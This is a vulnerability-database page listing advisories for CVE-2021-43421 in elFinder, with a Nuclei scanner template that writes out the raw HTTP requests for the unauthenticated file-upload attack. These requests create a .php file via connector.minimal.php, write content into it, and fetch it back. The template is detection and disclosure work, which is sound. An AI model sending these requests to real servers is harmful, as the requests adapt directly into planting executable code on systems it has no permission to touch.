| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
| CVE-2021-43421 | 7 Apr 202217:15 | – | attackerkb | |
| Studio 42 elFinder 代码问题漏洞 | 7 Apr 202200:00 | – | cnnvd | |
| CVE-2021-43421 | 7 Apr 202216:18 | – | cve | |
| CVE-2021-43421 | 7 Apr 202216:18 | – | cvelist | |
| elFinder Unrestricted File Upload vulnerability | 8 Apr 202200:00 | – | github | |
| CVE-2021-43421 | 7 Apr 202217:15 | – | nvd | |
| elFinder < 2.1.60 RCE Vulnerability | 11 Apr 202200:00 | – | openvas | |
| GHSA-X4JX-HJWF-GC99 elFinder Unrestricted File Upload vulnerability | 8 Apr 202200:00 | – | osv | |
| Unrestricted file upload | 7 Apr 202217:15 | – | prion | |
| CVE-2021-43421 | 22 May 202518:50 | – | redhatcve |
id: CVE-2021-43421
info:
name: Studio-42 elFinder <2.1.60 - Arbitrary File Upload
author: akincibor
severity: critical
description: |
Studio-42 elFinder 2.0.4 to 2.1.59 is vulnerable to unauthenticated file upload via connector.minimal.php which could allow a remote user to upload arbitrary files and execute PHP code.
impact: |
Successful exploitation of this vulnerability could allow an attacker to upload malicious files to the server and execute arbitrary code.
remediation: |
Upgrade to the latest version of Studio-42 elFinder plugin (2.1.60 or higher) to mitigate this vulnerability.
reference:
- https://github.com/Studio-42/elFinder/issues/3429
- https://twitter.com/infosec_90/status/1455180286354919425
- https://nvd.nist.gov/vuln/detail/CVE-2021-43421
- https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-43421
cwe-id: CWE-434
epss-score: 0.42781
epss-percentile: 0.98558
cpe: cpe:2.3:a:std42:elfinder:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 3
vendor: std42
product: elfinder
tags: cve,cve2021,elfinder,fileupload,rce,intrusive,std42,vuln
http:
- raw:
- |
GET /elFinder/php/connector.minimal.php?cmd=mkfile&target=l1_Lw&name={{randstr}}.php:aaa HTTP/1.1
Host: {{Hostname}}
Accept: */*
- |
GET /elFinder/php/connector.minimal.php?cmd=put&target={{hash}}&content={{randstr_1}} HTTP/1.1
Host: {{Hostname}}
- |
GET /elfinder/files/{{randstr}}.php%3Aaaa?_t= HTTP/1.1
Host: {{Hostname}}
Accept: */*
matchers:
- type: dsl
dsl:
- 'contains(body_3, "{{randstr_1}}")'
- "status_code == 200"
condition: and
extractors:
- type: regex
name: hash
group: 1
regex:
- '"hash"\:"(.*?)"\,'
internal: true
# digest: 4a0a00473045022100d45c9d7e8acacbca850d37547e000103a2627c73187bda767abf64d0c282bf9002202a34c493b654d8236c310ca57013d1a9743fcf479c03204b5987fd09cde11d23:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation